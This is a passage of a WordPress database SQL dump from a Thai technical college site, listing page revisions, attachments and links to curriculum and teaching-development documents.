'ช่างไฟฟ้า', '', 'inherit', 'closed', 'closed', '', '2074-revision-v1', '', '', '2018-05-02 16:38:02', '2018-05-02 09:38:02', '', 2074, 'http://www.technicrayong.ac.th/2074-revision-v1/', 0, 'revision', '', 0),
(2089, 3, '2018-05-04 16:14:07', '2018-05-04 09:14:07', '', '201805041556', '', 'inherit', 'closed', 'closed', '', '201805041556', '', '', '2018-05-04 16:14:07', '2018-05-04 09:14:07', '', 0, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/01/201805041556.pdf', 0, 'attachment', 'application/pdf', 0),
(2090, 3, '2018-05-04 16:15:22', '2018-05-04 09:15:22', '', 'ค่าลงทะเบียนเรียน ระดับ ปวส.', '', 'inherit', 'closed', 'closed', '', '%e0%b8%84%e0%b9%88%e0%b8%b2%e0%b8%a5%e0%b8%87%e0%b8%97%e0%b8%b0%e0%b9%80%e0%b8%9a%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%a3%e0%b8%b0%e0%b8%94%e0%b8%b1%e0%b8%9a', '', '', '2018-05-04 16:15:22', '2018-05-04 09:15:22', '', 0, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/01/ค่าลงทะเบียนเรียน-ระดับ-ปวส..pdf', 0, 'attachment', 'application/pdf', 0),
(2091, 3, '2018-05-04 16:16:17', '2018-05-04 09:16:17', '', 'ค่าลงทะเบียนเรียน ระดับ ปวช', '', 'inherit', 'closed', 'closed', '', '%e0%b8%84%e0%b9%88%e0%b8%b2%e0%b8%a5%e0%b8%87%e0%b8%97%e0%b8%b0%e0%b9%80%e0%b8%9a%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%a3%e0%b8%b0%e0%b8%94%e0%b8%b1-2', '', '', '2018-05-04 16:16:17', '2018-05-04 09:16:17', '', 0, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/01/ค่าลงทะเบียนเรียน-ระดับ-ปวช.pdf', 0, 'attachment', 'application/pdf', 0),
(2092, 3, '2018-05-04 16:17:23', '2018-05-04 09:17:23', '', '201805041557-2', '', 'inherit', 'closed', 'closed', '', '201805041557-2', '', '', '2018-05-04 16:17:23', '2018-05-04 09:17:23', '', 0, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/01/201805041557-2.pdf', 0, 'attachment', 'application/pdf', 0),
(2099, 3, '2018-05-04 16:30:26', '2018-05-04 09:30:26', '', 'ค่าลงทะเบียนเรียน ระดับ ปวส.', '', 'inherit', 'closed', 'closed', '', '%e0%b8%84%e0%b9%88%e0%b8%b2%e0%b8%a5%e0%b8%87%e0%b8%97%e0%b8%b0%e0%b9%80%e0%b8%9a%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%a3%e0%b8%b0%e0%b8%94%e0%b8%b1-3', '', '', '2018-05-04 16:30:26', '2018-05-04 09:30:26', '', 0, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/01/ค่าลงทะเบียนเรียน-ระดับ-ปวส.-1.pdf', 0, 'attachment', 'application/pdf', 0),
(2115, 1, '2018-05-05 09:00:29', '2018-05-05 02:00:29', '', 'Slider-05', '', 'inherit', 'closed', 'closed', '', '151-autosave-v1', '', '', '2018-05-05 09:00:29', '2018-05-05 02:00:29', '', 151, 'http://www.technicrayong.ac.th/151-autosave-v1/', 0, 'revision', '', 0),
(2123, 3, '2018-05-05 13:57:02', '2018-05-05 06:57:02', '', 'e-Student ระยอง ver. 2', '', 'inherit', 'closed', 'closed', '', 'e-student-%e0%b8%a3%e0%b8%b0%e0%b8%a2%e0%b8%ad%e0%b8%87-ver-2', '', '', '2018-05-05 13:57:02', '2018-05-05 06:57:02', '', 0, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/e-Student-ระยอง-ver.-2.pdf', 0, 'attachment', 'application/pdf', 0),
(2139, 1, '2018-05-05 16:06:24', '2018-05-05 09:06:24', '', 'คู่มือการลงทะเบียน', '', 'inherit', 'closed', 'closed', '', 'rtc-e-student-ver-2', '', '', '2018-05-05 16:07:24', '2018-05-05 09:07:24', '', 0, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-e-student-ver-2.pdf', 0, 'attachment', 'application/pdf', 0),
(2149, 4, '2018-05-06 13:05:58', '0000-00-00 00:00:00', '', '', '', 'draft', 'closed', 'closed', '', '', '', '', '2018-05-06 13:05:58', '2018-05-06 06:05:58', '', 0, 'http://www.technicrayong.ac.th/?page_id=2149', 0, 'page', '', 0),
(2153, 4, '2018-05-06 13:48:28', '2018-05-06 06:48:28', '<h4><a href=\"https://wp.me/P9wTWB-iW\">ตารางสอน</a></h4>\r\n<h4><a href=\"https://wp.me/P9wTWB-j2\">ตารางเรียน</a></h4>\r\n<h1>เอกสารพัฒนาการเรียนการสอน</h1>\r\nคู่มือ ID Plan\r\n\r\nคู่มือ PLC\r\n\r\nเอกสารสรุปขอบเขตการประชุมสร้างความเข้าใจ ID Plan และ PLC 27 เมษายน 2561\r\n\r\nเอกสารประกอบการบรรยาย ID Plan\r\n\r\nเอกสารประกอบการบรรรยาย PLC\r\n\r\nเอกสารประกอบการบรรยาย ว.21\r\n\r\n<a href=\"http://bsq2.vec.go.th/document/%E0%B8%84%E0%B8%B9%E0%B9%88%E0%B8%A1%E0%B8%B7%E0%B8%AD%E0%B8%88%E0%B8%B1%E0%B8%94%E0%B8%97%E0%B8%B3%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%88%E0%B8%B1%E0%B8%94%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B8%A3%E0%B8%B9%E0%B9%89%E0%B8%A1%E0%B8%B8%E0%B9%88%E0%B8%87%E0%B9%80%E0%B8%99%E0%B9%89%E0%B8%99%E0%B8%AA%E0%B8%A1%E0%B8%A3%E0%B8%A3%E0%B8%96%E0%B8%99%E0%B8%B0%20(%E0%B9%80%E0%B8%A5%E0%B9%88%E0%B8%A1%E0%B8%97%E0%B8%B5%E0%B9%88%201)/%E0%B9%80%E0%B8%A5%E0%B9%88%E0%B8%A1%E0%B8%97%E0%B8%B5%E0%B9%881.rar\">คู่มือการจัดทำแผนการเรียนรู้มุ่งเน้นสมรรถนะ </a>\r\n\r\n<a href=\"http://bsq2.vec.go.th/document/%E0%B8%84%E0%B8%B9%E0%B9%88%E0%B8%A1%E0%B8%B7%E0%B8%AD%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%82%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%A7%E0%B8%B4%E0%B8%88%E0%B8%B1%E0%B8%A2%E0%B9%80%E0%B8%9E%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%9E%E0%B8%B1%E0%B8%92%E0%B8%99%E0%B8%B2%E0%B8%84%E0%B8%B8%E0%B8%A3%E0%B8%A0%E0%B8%B2%E0%B8%9E%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%88%E0%B8%B1%E0%B8%94%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%AA%E0%B8%AD%E0%B8%99%E0%B8%AD%E0%B8%B2%E0%B8%8A%E0%B8%B5%E0%B8%A7%E0%B8%A8%E0%B8%B6%E0%B8%81%E0%B8%A9%E0%B8%B2/%E0%B9%80%E0%B8%A5%E0%B9%88%E0%B8%A1%E0%B8%97%E0%B8%B5%E0%B9%882.rar\">คู่มือการเขียนรายงานการวิจัย</a>\r\n\r\n<a href=\"https://wp.me/P9wTWB-gF\"><strong>แบบฟอร์มสำหรับครูผู้สอน</strong></a>\r\n\r\n<a href=\"https://wp.me/P9wTWB-jb\">แบบฟอร์มสำหรับนักเรียนนักศึกษา</a>\r\n\r\n ', 'งานพัฒนาหลักสูตรและการเรียนการสอน', '', 'inherit', 'closed', 'closed', '', '1000-revision-v1', '', '', '2018-05-06 13:48:28', '2018-05-06 06:48:28', '', 1000, 'http://www.technicrayong.ac.th/1000-revision-v1/', 0, 'revision', '', 0),
(2154, 4, '2018-05-06 13:56:14', '2018-05-06 06:56:14', '<h1>ตารางสอน</h1>\r\n \r\n<h1>ตารางเรียน</h1>\r\n \r\n<h1>เอกสารพัฒนาการเรียนการสอน</h1>\r\nคู่มือ ID Plan\r\n\r\nคู่มือ PLC\r\n\r\nเอกสารสรุปขอบเขตการประชุมสร้างความเข้าใจ ID Plan และ PLC 27 เมษายน 2561\r\n\r\nเอกสารประกอบการบรรยาย ID Plan\r\n\r\nเอกสารประกอบการบรรรยาย PLC\r\n\r\nเอกสารประกอบการบรรยาย ว.21\r\n\r\n<a href=\"http://bsq2.vec.go.th/document/%E0%B8%84%E0%B8%B9%E0%B9%88%E0%B8%A1%E0%B8%B7%E0%B8%AD%E0%B8%88%E0%B8%B1%E0%B8%94%E0%B8%97%E0%B8%B3%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%88%E0%B8%B1%E0%B8%94%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B8%A3%E0%B8%B9%E0%B9%89%E0%B8%A1%E0%B8%B8%E0%B9%88%E0%B8%87%E0%B9%80%E0%B8%99%E0%B9%89%E0%B8%99%E0%B8%AA%E0%B8%A1%E0%B8%A3%E0%B8%A3%E0%B8%96%E0%B8%99%E0%B8%B0%20(%E0%B9%80%E0%B8%A5%E0%B9%88%E0%B8%A1%E0%B8%97%E0%B8%B5%E0%B9%88%201)/%E0%B9%80%E0%B8%A5%E0%B9%88%E0%B8%A1%E0%B8%97%E0%B8%B5%E0%B9%881.rar\">คู่มือการจัดทำแผนการเรียนรู้มุ่งเน้นสมรรถนะ </a>\r\n\r\n<a href=\"http://bsq2.vec.go.th/document/%E0%B8%84%E0%B8%B9%E0%B9%88%E0%B8%A1%E0%B8%B7%E0%B8%AD%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%82%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%A7%E0%B8%B4%E0%B8%88%E0%B8%B1%E0%B8%A2%E0%B9%80%E0%B8%9E%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%9E%E0%B8%B1%E0%B8%92%E0%B8%99%E0%B8%B2%E0%B8%84%E0%B8%B8%E0%B8%A3%E0%B8%A0%E0%B8%B2%E0%B8%9E%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%88%E0%B8%B1%E0%B8%94%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%AA%E0%B8%AD%E0%B8%99%E0%B8%AD%E0%B8%B2%E0%B8%8A%E0%B8%B5%E0%B8%A7%E0%B8%A8%E0%B8%B6%E0%B8%81%E0%B8%A9%E0%B8%B2/%E0%B9%80%E0%B8%A5%E0%B9%88%E0%B8%A1%E0%B8%97%E0%B8%B5%E0%B9%882.rar\">คู่มือการเขียนรายงานการวิจัย</a>\r\n\r\n<a href=\"https://wp.me/P9wTWB-gF\"><strong>แบบฟอร์มสำหรับครูผู้สอน</strong></a>\r\n\r\n<a href=\"https://wp.me/P9wTWB-jb\">แบบฟอร์มสำหรับนักเรียนนักศึกษา</a>\r\n\r\n ', 'งานพัฒนาหลักสูตรและการเรียนการสอน', '', 'inherit', 'closed', 'closed', '', '1000-revision-v1', '', '', '2018-05-06 13:56:14', '2018-05-06 06:56:14', '', 1000, 'http://www.technicrayong.ac.th/1000-revision-v1/', 0, 'revision', '', 0),
(2156, 4, '2018-05-06 14:08:53', '2018-05-06 07:08:53', '', '20100887_10061619190731', '', 'inherit', 'closed', 'closed', '', '20100887_10061619190731', '', '', '2018-05-06 14:08:53', '2018-05-06 07:08:53', '', 1000, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/20100887_10061619190731.gif', 0, 'attachment', 'image/gif', 0),
(2157, 4, '2018-05-06 14:13:49', '2018-05-06 07:13:49', '', 'vit21', '', 'inherit', 'closed', 'closed', '', 'vit21', '', '', '2018-05-06 14:13:49', '2018-05-06 07:13:49', '', 1000, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/vit21.pptx', 0, 'attachment', 'application/vnd.openxmlformats-officedocument.presentationml.presentation', 0),
(2158, 4, '2018-05-06 14:14:03', '2018-05-06 07:14:03', '', 'การประเมินตนเองและการจัดทำ ID PLAN', '', 'inherit', 'closed', 'closed', '', '%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99%e0%b8%95%e0%b8%99%e0%b9%80%e0%b8%ad%e0%b8%87%e0%b9%81%e0%b8%a5%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%88', '', '', '2018-05-06 14:14:03', '2018-05-06 07:14:03', '', 1000, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/การประเมินตนเองและการจัดทำ-ID-PLAN.pptx', 0, 'attachment', 'application/vnd.openxmlformats-officedocument.presentationml.presentation', 0),
(2159, 4, '2018-05-06 14:14:24', '2018-05-06 07:14:24', '', 'แนวทางการขับเคลื่อนกระบวนการ PLC', '', 'inherit', 'closed', 'closed', '', '%e0%b9%81%e0%b8%99%e0%b8%a7%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%82%e0%b8%b1%e0%b8%9a%e0%b9%80%e0%b8%84%e0%b8%a5%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%99%e0%b8%81%e0%b8%a3%e0%b8%b0', '', '', '2018-05-06 14:14:24', '2018-05-06 07:14:24', '', 1000, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/แนวทางการขับเคลื่อนกระบวนการ-PLC.pptx', 0, 'attachment', 'application/vnd.openxmlformats-officedocument.presentationml.presentation', 0),
(2160, 4, '2018-05-06 14:16:30', '2018-05-06 07:16:30', '', '3.แบบประเมินสมรรถนะ (แบ่งตามวิทยฐานะ)', '', 'inherit', 'closed', 'closed', '', '3-%e0%b9%81%e0%b8%9a%e0%b8%9a%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99%e0%b8%aa%e0%b8%a1%e0%b8%a3%e0%b8%a3%e0%b8%96%e0%b8%99%e0%b8%b0-%e0%b9%81%e0%b8%9a%e0%b9%88%e0%b8%87', '', '', '2018-05-06 14:16:30', '2018-05-06 07:16:30', '', 1000, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/3.แบบประเมินสมรรถนะ-แบ่งตามวิทยฐานะ.doc', 0, 'attachment', 'application/msword', 0),
(2161, 4, '2018-05-06 14:16:35', '2018-05-06 07:16:35', '', 'PLC_Action_Plan (1)', '', 'inherit', 'closed', 'closed', '', 'plc_action_plan-1', '', '', '2018-05-06 14:16:35', '2018-05-06 07:16:35', '', 1000, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/PLC_Action_Plan-1.docx', 0, 'attachment', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 0),
(2162, 4, '2018-05-06 14:18:58', '2018-05-06 07:18:58', '', 'PLC Cycle Report_ Demo BPCD 2018 (1) (1)', '', 'inherit', 'closed', 'closed', '', 'plc-cycle-report_-demo-bpcd-2018-1-1', '', '', '2018-05-06 14:18:58', '2018-05-06 07:18:58', '', 1000, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/PLC-Cycle-Report_-Demo-BPCD-2018-1-1.docx', 0, 'attachment', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 0),
(2163, 4, '2018-05-06 14:19:23', '2018-05-06 07:19:23', '', 'LTeacher-1234567891234-สมชาย-ใจดี (1) (2)', '', 'inherit', 'closed', 'closed', '', 'lteacher-1234567891234-%e0%b8%aa%e0%b8%a1%e0%b8%8a%e0%b8%b2%e0%b8%a2-%e0%b9%83%e0%b8%88%e0%b8%94%e0%b8%b5-1-2', '', '', '2018-05-06 14:19:23', '2018-05-06 07:19:23', '', 1000, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/LTeacher-1234567891234-สมชาย-ใจดี-1-2.xlsm', 0, 'attachment', 'application/vnd.ms-excel.sheet.macroEnabled.12', 0),
(2165, 4, '2018-05-06 14:24:58', '2018-05-06 07:24:58', '', 'Ex10', '', 'inherit', 'closed', 'closed', '', 'ex10', '', '', '2018-05-06 14:24:58', '2018-05-06 07:24:58', '', 1000, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/Ex10.jpg', 0, 'attachment', 'image/jpeg', 0),
(2166, 4, '2018-05-06 21:02:46', '2018-05-06 14:02:46', '<h1>ตารางสอน</h1>\r\n<h1>ตารางเรียน</h1>\r\n<h1>เอกสารพัฒนาการเรียนการสอน</h1>\r\n<a href=\"https://drive.google.com/open?id=1zgMqsJ1EQAf994V8G0dQLF8OidBBP5Rs\">คู่มือ ID Plan</a>\r\n\r\nคู่มือ PLC\r\n\r\n<a href=\"https://drive.google.com/open?id=1DUO94GAj503xoHcT_zh42s7UEZ76_Yu9\">เอกสารประกอบการบรรยายการประเมินตนเองและ ID Plan</a>\r\n\r\n<a href=\"https://drive.google.com/open?id=1iEy9kHBnv7TkIEOFnr1X8FmtQ_J3Z52C\">เอกสารประกอบการบรรยาย PLC</a>\r\n\r\n<a href=\"https://drive.google.com/open?id=13W0BfhXa2lokedlGTwLCq3-Tp4Ta4np0\">เอกสารประกอบการบรรยาย ว.21</a>\r\n\r\n<a href=\"https://drive.google.com/open?id=1S8NUwHl1LTsPKIwiTVwvdpEqurK9ojV6\">ถาม-ตอบ เกี่ยวกับ ว.21</a>\r\n\r\n<a href=\"http://bsq2.vec.go.th/document/%E0%B8%84%E0%B8%B9%E0%B9%88%E0%B8%A1%E0%B8%B7%E0%B8%AD%E0%B8%88%E0%B8%B1%E0%B8%94%E0%B8%97%E0%B8%B3%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%88%E0%B8%B1%E0%B8%94%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B8%A3%E0%B8%B9%E0%B9%89%E0%B8%A1%E0%B8%B8%E0%B9%88%E0%B8%87%E0%B9%80%E0%B8%99%E0%B9%89%E0%B8%99%E0%B8%AA%E0%B8%A1%E0%B8%A3%E0%B8%A3%E0%B8%96%E0%B8%99%E0%B8%B0%20(%E0%B9%80%E0%B8%A5%E0%B9%88%E0%B8%A1%E0%B8%97%E0%B8%B5%E0%B9%88%201)/%E0%B9%80%E0%B8%A5%E0%B9%88%E0%B8%A1%E0%B8%97%E0%B8%B5%E0%B9%881.rar\">คู่มือการจัดทำแผนการเรียนรู้มุ่งเน้นสมรรถนะ </a>\r\n\r\n<a href=\"http://bsq2.vec.go.th/document/%E0%B8%84%E0%B8%B9%E0%B9%88%E0%B8%A1%E0%B8%B7%E0%B8%AD%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%82%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%A7%E0%B8%B4%E0%B8%88%E0%B8%B1%E0%B8%A2%E0%B9%80%E0%B8%9E%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%9E%E0%B8%B1%E0%B8%92%E0%B8%99%E0%B8%B2%E0%B8%84%E0%B8%B8%E0%B8%A3%E0%B8%A0%E0%B8%B2%E0%B8%9E%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%88%E0%B8%B1%E0%B8%94%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%AA%E0%B8%AD%E0%B8%99%E0%B8%AD%E0%B8%B2%E0%B8%8A%E0%B8%B5%E0%B8%A7%E0%B8%A8%E0%B8%B6%E0%B8%81%E0%B8%A9%E0%B8%B2/%E0%B9%80%E0%B8%A5%E0%B9%88%E0%B8%A1%E0%B8%97%E0%B8%B5%E0%B9%882.rar\">คู่มือการเขียนรายงานการวิจัย</a>\r\n\r\n<a href=\"https://wp.me/P9wTWB-gF\"><strong>แบบฟอร์มสำหรับครูผู้สอน</strong></a>\r\n\r\n<a href=\"https://wp.me/P9wTWB-jb\">แบบฟอร์มสำหรับนักเรียนนักศึกษา</a>\r\n\r\n ', 'งานพัฒนาหลักสูตรและการเรียนการสอน', '', 'inherit', 'closed', 'closed', '', '1000-revision-v1', '', '', '2018-05-06 21:02:46', '2018-05-06 14:02:46', '', 1000, 'http://www.technicrayong.ac.th/1000-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2167, 4, '2018-05-06 21:03:57', '2018-05-06 14:03:57', '<h1>ตารางสอน</h1>\r\n<h1>ตารางเรียน</h1>\r\n<h1>เอกสารพัฒนาการเรียนการสอน</h1>\r\n<a href=\"https://drive.google.com/open?id=1zgMqsJ1EQAf994V8G0dQLF8OidBBP5Rs\">คู่มือ ID Plan</a>\r\n\r\nคู่มือ PLC\r\n\r\n<a href=\"https://drive.google.com/open?id=1DUO94GAj503xoHcT_zh42s7UEZ76_Yu9\">เอกสารประกอบการบรรยายการประเมินตนเองและ ID Plan</a>\r\n\r\n<a href=\"https://drive.google.com/open?id=1iEy9kHBnv7TkIEOFnr1X8FmtQ_J3Z52C\">เอกสารประกอบการบรรยาย PLC</a>\r\n\r\n<a href=\"https://drive.google.com/open?id=13W0BfhXa2lokedlGTwLCq3-Tp4Ta4np0\">เอกสารประกอบการบรรยาย ว.21</a>\r\n\r\n<a href=\"https://drive.google.com/open?id=1S8NUwHl1LTsPKIwiTVwvdpEqurK9ojV6\">ถาม-ตอบ เกี่ยวกับ ว.21</a>\r\n\r\n<a href=\"http://bsq2.vec.go.th/document/%E0%B8%84%E0%B8%B9%E0%B9%88%E0%B8%A1%E0%B8%B7%E0%B8%AD%E0%B8%88%E0%B8%B1%E0%B8%94%E0%B8%97%E0%B8%B3%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%88%E0%B8%B1%E0%B8%94%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B8%A3%E0%B8%B9%E0%B9%89%E0%B8%A1%E0%B8%B8%E0%B9%88%E0%B8%87%E0%B9%80%E0%B8%99%E0%B9%89%E0%B8%99%E0%B8%AA%E0%B8%A1%E0%B8%A3%E0%B8%A3%E0%B8%96%E0%B8%99%E0%B8%B0%20(%E0%B9%80%E0%B8%A5%E0%B9%88%E0%B8%A1%E0%B8%97%E0%B8%B5%E0%B9%88%201)/%E0%B9%80%E0%B8%A5%E0%B9%88%E0%B8%A1%E0%B8%97%E0%B8%B5%E0%B9%881.rar\">คู่มือการจัดทำแผนการเรียนรู้มุ่งเน้นสมรรถนะ </a>\r\n\r\n<a href=\"http://bsq2.vec.go.th/document/%E0%B8%84%E0%B8%B9%E0%B9%88%E0%B8%A1%E0%B8%B7%E0%B8%AD%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%82%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%A7%E0%B8%B4%E0%B8%88%E0%B8%B1%E0%B8%A2%E0%B9%80%E0%B8%9E%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%9E%E0%B8%B1%E0%B8%92%E0%B8%99%E0%B8%B2%E0%B8%84%E0%B8%B8%E0%B8%A3%E0%B8%A0%E0%B8%B2%E0%B8%9E%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%88%E0%B8%B1%E0%B8%94%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%AA%E0%B8%AD%E0%B8%99%E0%B8%AD%E0%B8%B2%E0%B8%8A%E0%B8%B5%E0%B8%A7%E0%B8%A8%E0%B8%B6%E0%B8%81%E0%B8%A9%E0%B8%B2/%E0%B9%80%E0%B8%A5%E0%B9%88%E0%B8%A1%E0%B8%97%E0%B8%B5%E0%B9%882.rar\">คู่มือการเขียนรายงานการวิจัย</a>\r\n<h2><a href=\"https://wp.me/P9wTWB-gF\"><strong>แบบฟอร์มสำหรับครูผู้สอน</strong></a></h2>\r\n<h2><a href=\"https://wp.me/P9wTWB-jb\">แบบฟอร์มสำหรับนักเรียนนักศึกษา</a></h2>\r\n ', 'งานพัฒนาหลักสูตรและการเรียนการสอน', '', 'inherit', 'closed', 'closed', '', '1000-revision-v1', '', '', '2018-05-06 21:03:57', '2018-05-06 14:03:57', '', 1000, 'http://www.technicrayong.ac.th/1000-revision-v1/', 0, 'revision', '', 0),
(2168, 4, '2018-05-06 21:06:05', '2018-05-06 14:06:05', '<h2><span style=\"color: #800080;\">ตารางสอน</span></h2>\r\n<h2><span style=\"color: #800080;\">ตารางเรียน</span></h2>\r\n<h2><span style=\"color: #800080;\">เอกสารพัฒนาการเรียนการสอน</span></h2>\r\n<p style=\"padding-left: 30px;\"><a href=\"https://drive.google.com/open?id=1zgMqsJ1EQAf994V8G0dQLF8OidBBP5Rs\">คู่มือ ID Plan</a></p>\r\n<p style=\"padding-left: 30px;\">คู่มือ PLC</p>\r\n<p style=\"padding-left: 30px;\"><a href=\"https://drive.google.com/open?id=1DUO94GAj503xoHcT_zh42s7UEZ76_Yu9\">เอกสารประกอบการบรรยายการประเมินตนเองและ ID Plan</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"https://drive.google.com/open?id=1iEy9kHBnv7TkIEOFnr1X8FmtQ_J3Z52C\">เอกสารประกอบการบรรยาย PLC</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"https://drive.google.com/open?id=13W0BfhXa2lokedlGTwLCq3-Tp4Ta4np0\">เอกสารประกอบการบรรยาย ว.21</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"https://drive.google.com/open?id=1S8NUwHl1LTsPKIwiTVwvdpEqurK9ojV6\">ถาม-ตอบ เกี่ยวกับ ว.21</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"http://bsq2.vec.go.th/document/%E0%B8%84%E0%B8%B9%E0%B9%88%E0%B8%A1%E0%B8%B7%E0%B8%AD%E0%B8%88%E0%B8%B1%E0%B8%94%E0%B8%97%E0%B8%B3%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%88%E0%B8%B1%E0%B8%94%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B8%A3%E0%B8%B9%E0%B9%89%E0%B8%A1%E0%B8%B8%E0%B9%88%E0%B8%87%E0%B9%80%E0%B8%99%E0%B9%89%E0%B8%99%E0%B8%AA%E0%B8%A1%E0%B8%A3%E0%B8%A3%E0%B8%96%E0%B8%99%E0%B8%B0%20(%E0%B9%80%E0%B8%A5%E0%B9%88%E0%B8%A1%E0%B8%97%E0%B8%B5%E0%B9%88%201)/%E0%B9%80%E0%B8%A5%E0%B9%88%E0%B8%A1%E0%B8%97%E0%B8%B5%E0%B9%881.rar\">คู่มือการจัดทำแผนการเรียนรู้มุ่งเน้นสมรรถนะ </a></p>\r\n<p style=\"padding-left: 30px;\"><a 